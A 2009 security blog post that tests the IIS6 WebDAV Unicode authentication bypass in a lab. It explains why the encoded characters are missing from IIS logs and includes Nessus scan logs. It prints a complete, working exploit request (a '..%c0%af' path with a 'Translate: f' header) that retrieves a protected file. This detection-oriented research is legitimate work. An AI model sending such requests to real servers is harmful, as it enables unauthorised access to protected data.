Tuesday, May 19, 2009

Log Results of Successful IIS6 WebDAV Zero Day Attacks

I covered this a bit in my DarkReading blog but wanted to continue with my testing tonight to see what else I could find out. Plus, there are some new tool updates such as an auxiliary module for Metasploit and a plugin for Nessus.

There was an interesting follow-up to the DR blog on whether or not Microsoft Outlook Web Access was vulnerable. I don't have hands-on access to an OWA box but I hope to do some more testing on Tues.

What prompted me to write this post was an interesting finding posed in the correspondence regarding the logs and why the Unicode isn't showing up. The reader was wondering why the Unicode attacks were not showing up. Let's start first with some example logs right after what my telnet test looks like followed by my speculation as to the answer.
metasploit jsawyer$ telnet 192.168.43.128 80
Trying 192.168.43.128...
Connected to 192.168.43.128.
Escape character is '^]'.
GET /..%c0%af/admin/test.txt HTTP/1.1
Translate: f
Connection: close
Host: 192.168.43.128

HTTP/1.1 200 OK
Connection: close
Date: Tue, 19 May 2009 04:42:20 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/plain
Content-Length: 7
ETag: "ffbac9af6d7c91:1e1"
Last-Modified: Mon, 18 May 2009 20:20:09 GMT
Accept-Ranges: bytes

pwnage!
Telnet success:
2009-05-19 04:42:20 W3SVC1 192.168.43.128 GET /../admin/test.txt - 80 - 192.168.43.1 - 200 0 0
Metasploit finding the protected admin dir:
2009-05-19 04:33:12 W3SVC1 192.168.43.128 PROPFIND /admin/ - 80 - 192.168.43.1 - 401 2 2148074254
2009-05-19 04:33:13 W3SVC1 192.168.43.128 PROPFIND /admin/ - 80 - 192.168.43.1 - 207 0 0
As you can see in the successful telnet log entry above, the %c0%af is removed. I suspect the issue is due to how the WebDAV DLL is handling the request and that the logging occurs after the request is handle. It would make sense since the log has to accurately reflect the proper HTTP code. In this case, the vulnerable WebDAV function removes the Unicode, responds with the requested file and IIS then logs the request.

That's all I've got for now. It's nearing 2am and I'm starting to wane....

Yeah, can't sleep so, here's some logs on an Apache server from a Nessus scan with the new plugin. I'll test it against an IIS server in the morning.
- - [19/May/2009:02:04:48 -0400] "GET / HTTP/1.0" 200 45 "-" "-"
- - [19/May/2009:02:04:49 -0400] "GET / HTTP/1.0" 200 45 "-" "-"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "-"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "-"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /login.htm HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /intruvert/jsp/admin/Login.jsp HTTP/1.1" 404 348 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "Mozilla/4.75 [en] (X11; U; Nessus)"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /ControlManager/default.htm HTTP/1.1" 404 345 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /MSWSMTP/Common/Authentication/Logon.aspx HTTP/1.1" 404 359 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /commoncgi/servlet/CCGIServlet?ApHost=PDT_InterScan_NT&CGIAlias=PDT_InterScan_NT&File=logout.htm HTTP/1.1" 404 348 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /oGR_FLrEIIM_.html HTTP/1.1" 404 336 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /oGR_FLrEIIM_.cgi HTTP/1.1" 404 335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /oGR_FLrEIIM_.sh HTTP/1.1" 404 334 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /oGR_FLrEIIM_.pl HTTP/1.1" 404 334 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /oGR_FLrEIIM_.inc HTTP/1.1" 404 335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /oGR_FLrEIIM_.shtml HTTP/1.1" 404 337 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /oGR_FLrEIIM_.asp HTTP/1.1" 404 335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /oGR_FLrEIIM_.php HTTP/1.1" 404 335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /oGR_FLrEIIM_.php3 HTTP/1.1" 404 336 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /oGR_FLrEIIM_.cfm HTTP/1.1" 404 335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /cgi-bin/oGR_FLrEIIM_.html HTTP/1.1" 404 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /cgi-bin/oGR_FLrEIIM_.cgi HTTP/1.1" 404 343 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /cgi-bin/oGR_FLrEIIM_.sh HTTP/1.1" 404 342 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /cgi-bin/oGR_FLrEIIM_.pl HTTP/1.1" 404 342 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /cgi-bin/oGR_FLrEIIM_.inc HTTP/1.1" 404 343 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /cgi-bin/oGR_FLrEIIM_.shtml HTTP/1.1" 404 345 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /cgi-bin/oGR_FLrEIIM_.php HTTP/1.1" 404 343 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /cgi-bin/oGR_FLrEIIM_.php3 HTTP/1.1" 404 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET /cgi-bin/oGR_FLrEIIM_.cfm HTTP/1.1" 404 343 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "GET / HTTP/1.1" 200 45 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- - [19/May/2009:02:04:53 -0400] "OPTIONS * HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)